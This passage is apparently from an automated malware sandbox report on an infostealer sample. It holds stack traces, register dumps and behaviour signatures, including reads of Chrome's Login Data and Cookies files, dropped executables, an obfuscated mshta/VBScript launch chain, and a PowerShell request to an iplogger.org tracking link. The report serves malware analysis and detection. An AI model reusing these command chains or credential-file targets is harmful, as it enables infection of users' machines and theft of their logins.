WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x76a0e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76929367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76929326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7557788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x768ea48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x768e853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x768ea4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x768fcd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x768fd87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7566b727
registers.esp: 103477428
registers.edi: 4255300
registers.eax: 103477428
registers.ebp: 103477508
registers.edx: 131
registers.ebx: 103477792
registers.esi: 2147746133
registers.ecx: 4234592

__exception__

Sept. 19, 2021, 10:44 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x76a0f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7534414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x768dfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x76a0a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76fbe99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76f972ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76f8ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x76f8ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76f887f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x76f8ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75577bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x76fb516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x76fb50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76f8a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76f89b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76f89aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x76fb530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x76fb57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6b55540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6b5552ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6b630ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77b47e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x77b254f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7566b727
registers.esp: 62184848
registers.edi: 1989278224
registers.eax: 62184848
registers.ebp: 62184928
registers.edx: 1
registers.ebx: 3938820
registers.esi: 2147746133
registers.ecx: 3675731139

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\nsq7D29.tmp\6LVZM.dll
file	C:\Users\test22\AppData\Local\Temp\wwi.exe
file	C:\Users\test22\AppData\Local\Temp\wwl.exe
file	C:\Users\test22\AppData\Local\Temp\vss.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (10 events)

cmdline	"cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
cmdline	MSHtA VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if ""/PCOd0LPl_yA""== """" for %j In (""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	CmD.EXE /c CopY /y "C:\Users\test22\AppData\Local\Temp\vss.exe" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if ""=="" for %j In ("C:\Users\test22\AppData\Local\Temp\vss.exe" ) do taskkill /F -Im "%~Nxj"
cmdline	"C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\vss.exe" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if ""=="" for %j In ("C:\Users\test22\AppData\Local\Temp\vss.exe" ) do taskkill /F -Im "%~Nxj"
cmdline	"C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\vss.exe"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if """"== """" for %j In (""C:\Users\test22\AppData\Local\Temp\vss.exe"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	MSHtA VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\vss.exe"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if """"== """" for %j In (""C:\Users\test22\AppData\Local\Temp\vss.exe"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	CmD.EXE /c CopY /y "C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if "/PCOd0LPl_yA"=="" for %j In ("C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" ) do taskkill /F -Im "%~Nxj"
cmdline	"C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if "/PCOd0LPl_yA"=="" for %j In ("C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" ) do taskkill /F -Im "%~Nxj"
cmdline	"C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if ""/PCOd0LPl_yA""== """" for %j In (""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\wwi.exe
file	C:\Users\test22\AppData\Local\Temp\wwl.exe
file	C:\Users\test22\AppData\Local\Temp\vss.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\wwi.exe
file	C:\Users\test22\AppData\Local\Temp\vss.exe
file	C:\Users\test22\AppData\Local\Temp\GBmH.ye
file	C:\Users\test22\AppData\Local\Temp\wwl.exe
file	C:\Users\test22\AppData\Local\Temp\nsq7D29.tmp\6LVZM.dll

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vss.exe")

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 19, 2021, 10:43 a.m.	show_type: 0 filepath_r: CmD.EXE parameters: /c CopY /y "C:\Users\test22\AppData\Local\Temp\vss.exe" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if ""=="" for %j In ("C:\Users\test22\AppData\Local\Temp\vss.exe" ) do taskkill /F -Im "%~Nxj" filepath: CmD.EXE	1	1	0
ShellExecuteExW Sept. 19, 2021, 10:43 a.m.	show_type: 0 filepath_r: CmD.EXE parameters: /c CopY /y "C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if "/PCOd0LPl_yA"=="" for %j In ("C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" ) do taskkill /F -Im "%~Nxj" filepath: CmD.EXE	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 19, 2021, 10:43 a.m.	process_identifier: 876 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef60000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 19, 2021, 10:42 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 19, 2021, 10:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 19, 2021, 10:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 19, 2021, 10:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 19, 2021, 10:43 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (50 out of 124 events)

url	http://crl.comodo.net/TrustedCertificateServices.crl0
url	http://users.ocsp.d-trust.net03
url	http://crl.ssc.lt/root-b/cacrl.crl0
url	http://crl.securetrust.com/STCA.crl0
url	http://crl.securetrust.com/SGCA.crl0
url	http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url	http://www.ssc.lt/cps03
url	http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url	http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url	http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url	https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url	http://www.pkioverheid.nl/policies/root-policy0
url	http://cps.chambersign.org/cps/chambersroot.html0
url	http://www.e-szigno.hu/SZSZ/0
url	http://www.entrust.net/CRL/Client1.crl0
url	http://crl.chambersign.org/publicnotaryroot.crl0
url	http://crl.comodo.net/AAACertificateServices.crl0
url	http://www.certplus.com/CRL/class3.crl0
url	http://logo.verisign.com/vslogo.gif0
url	http://www.acabogacia.org/doc0
url	http://www.disig.sk/ca/crl/ca_disig.crl0
url	https://www.catcert.net/verarrel
url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://www.sk.ee/cps/0
url	http://www.quovadis.bm0
url	https://www.catcert.net/verarrel05
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url	http://crl.chambersign.org/chambersroot.crl0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url	http://crl.globalsign.net/root-r2.crl0
url	http://certificates.starfieldtech.com/repository/1604
url	http://www.d-trust.net0
url	http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url	http://crl.ssc.lt/root-a/cacrl.crl0
url	http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url	http://www.certicamara.com/certicamaraca.crl0
url	http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url	http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url	http://www.post.trust.ie/reposit/cps.html0
url	http://qual.ocsp.d-trust.net0
url	http://www2.public-trust.com/crl/ct/ctroot.crl0
url	http://www.certicamara.com0
url	http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url	http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url	http://www.comsign.co.il/cps0
url	http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0
url	http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url	http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
url	http://www.signatur.rtr.at/de/directory/cps.html0

Yara rule detected in process memory (50 out of 125 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Queries for potentially installed applications (50 out of 106 events)

Time & API	Arguments	Status
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000704 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: 7-Zip base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: AddressBook base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: Adobe AIR base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: Connection Manager base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: DirectDrawEx base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: EditPlus base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: ePageSafer base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ePageSafer	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: Fontcore base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: Google Chrome base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: IE40 base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: IE4Data base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: IE5BAKEX base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: IEData base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: MobileOptionPack base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: Office14.PROPLUS base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: SchedulingAgent base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: TouchEn nxKey base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TouchEn nxKey	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: UnINISafeWeb base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: UnINISafeWeb6 base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb6	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: WIC base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1 base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {1F1C2DFC-2D24-3E06-BCB8-725134ADF989} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1 base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {8941A397-4065-4F41-92CE-0EB610846EED}_is1 base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{8941A397-4065-4F41-92CE-0EB610846EED}_is1	1
